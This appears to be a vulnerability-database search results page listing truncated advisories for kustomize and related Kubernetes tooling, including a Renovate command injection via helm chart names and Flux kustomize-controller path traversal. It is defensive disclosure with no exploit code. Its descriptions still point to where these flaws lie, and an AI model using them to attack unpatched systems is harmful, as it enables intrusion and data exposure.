79 matches found
GHSA-FV83-X2XW-2J55 vulnerabilities
Vulnerabilities for packages: apko, karpenter, clickhouse-operator, grafana-operator, temporal, flux-image-automation-controller, aws-load-balancer-controller, github-mcp-server, secrets-store-csi-driver-provider-aws, grafana-rollout-operator, ingress-nginx-controller,...
CVE-2026-34986 vulnerabilities
Vulnerabilities for packages: agentbeat, zot, tw, skaffold, podman, skopeo-fips, skopeo, neuvector-scanner-fips, kyverno-fips, spicedb-fips, sqlexporter-fips, cloudflared, bento-fips, keda-fips, dex, harbor-fips, dex-fips, opencost-fips, kubescape-server-fips, syft, tekton-chains-fips, fulcio-fip...
CLEANSTART-2026-VP44686 Security fixes for CVE-2025-58183, CVE-2025-58185, CVE-2025-58187, CVE-2025-58188, CVE-2025-58189, CVE-2025-61723, CVE-2025-61724, CVE-2025-61725, CVE-2025-61732, CVE-2025-68121 applied in versions: 5.7.1-r0, 5.7.1-r1
Multiple security vulnerabilities affect the kustomize-fips package. These issues are resolved in later releases. See references for individual vulnerability details...
GHSA-8FJ7-8H3W-XWFM vulnerabilities
Vulnerabilities for packages: zot, rancher-support-bundle-kit, src, terraform-provider-aws-fips, crossplane-provider-aws-kms, traefik, nova-fips, syncthing-fips, kyverno-policy-reporter-fips, omni, kube-logging-operator, grafana-mimir, helm-diff-fips, apko, kubo-fips, apm-server,...
CVE-2026-27141 vulnerabilities
Vulnerabilities for packages: zot, rancher-support-bundle-kit, src, terraform-provider-aws-fips, crossplane-provider-aws-kms, traefik, nova-fips, syncthing-fips, kyverno-policy-reporter-fips, omni, kube-logging-operator, grafana-mimir, helm-diff-fips, apko, kubo-fips, apm-server,...
CVE-2026-1229 vulnerabilities
Vulnerabilities for packages: xeol, crossplane-provider-aws-kinesis, crossplane-provider-aws-ec2, argo-rollouts, crossplane-provider-azure-authorization, grafana-alloy, crossplane-provider-aws-route53, k9s, zot, actions-runner-controller, crossplane-provider-aws-iam,...
GHSA-Q9HV-HPM4-HJ6X vulnerabilities
Vulnerabilities for packages: xeol, crossplane-provider-aws-kinesis, crossplane-provider-aws-ec2, argo-rollouts, crossplane-provider-azure-authorization, grafana-alloy, crossplane-provider-aws-route53, k9s, zot, actions-runner-controller, crossplane-provider-aws-iam,...
CVE-2026-1229 vulnerabilities
Vulnerabilities for packages: flux-source-controller-fips, helm-push, zot, argocd-image-updater, extism, crossplane-provider-aws-kms, trivy-fips, skaffold, omni, boring-registry, rancher-fleet, flux-helm-controller-fips, q, terraform, vcluster, helm-diff-fips, apko,...
GHSA-FW7P-63QQ-7HPR vulnerabilities
Vulnerabilities for packages: agentbeat, kyverno-policy-reporter-fips, seaweedfs, juicefs, apko, step-ca-fips, keda, openfga-fips, kyverno-fips, spicedb-fips, sqlexporter-fips, keda-fips, dex, vault, sops-fips, dex-fips, trillian-fips, splunk-otel-collector, vault-fips, fulcio-fips,...
Renovate vulnerable to arbitrary command injection via kustomize manager and malicious helm repository
Summary The user-provided chart name in the kustomize manager is appended to the helm pull --untar command without proper sanitization. Details Adversaries can provide a maliciously crafted kustomization.yaml in conjunction with a Helm repo's index.yaml file to trick Renovate to execute arbitrary...
GHSA-XV56-3WQ5-9997 Renovate vulnerable to arbitrary command injection via kustomize manager and malicious helm repository
Summary The user-provided chart name in the kustomize manager is appended to the helm pull --untar command without proper sanitization. Details Adversaries can provide a maliciously crafted kustomization.yaml in conjunction with a Helm repo's index.yaml file to trick Renovate to execute arbitrary...
EUVD-2026-2097
Renovate vulnerable to arbitrary command injection via kustomize manager and malicious helm repository...
CVE-2021-41254
kustomize-controller is a Kubernetes operator, specialized in running continuous delivery pipelines for infrastructure and workloads defined with Kubernetes manifests and assembled with Kustomize. Users that can create Kubernetes Secrets, Service Accounts and Flux Kustomization objects, could...
[SECURITY] Fedora 42 Update: kustomize-5.8.0-1.fc42
Customization of kubernetes YAML configurations...
[SECURITY] Fedora 43 Update: kustomize-5.8.0-1.fc43
Customization of kubernetes YAML configurations...
Fedora: Security Advisory (FEDORA-2025-ecfd96d6a3)
The remote host is missing an update for the SPDX-FileCopyrightText: 2025 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...
Fedora 42 : kustomize (2025-a887e86abc)
The remote Fedora 42 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2025-a887e86abc advisory. Update to 5.8.0 Tenable has extracted the preceding description block directly from the Fedora security advisory. Note that Nessus has not tested fo...
Fedora 43 : kustomize (2025-ecfd96d6a3)
The remote Fedora 43 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2025-ecfd96d6a3 advisory. Update to 5.8.0 Tenable has extracted the preceding description block directly from the Fedora security advisory. Note that Nessus has not tested fo...
BIT-FLUX-2022-24878 Improper path handling in Kustomization files allows for denial of service
Flux is an open and extensible continuous delivery solution for Kubernetes. Path Traversal in the kustomize-controller via a malicious kustomization.yaml allows an attacker to cause a Denial of Service at the controller level. Workarounds include automated tooling in the user's CI/CD pipeline to...
BIT-FLUX-2022-24877 Improper path handling in kustomization files allows path traversal
Flux is an open and extensible continuous delivery solution for Kubernetes. Path Traversal in the kustomize-controller via a malicious kustomization.yaml allows an attacker to expose sensitive data from the controller’s pod filesystem and possibly privilege escalation in multi-tenancy deployments...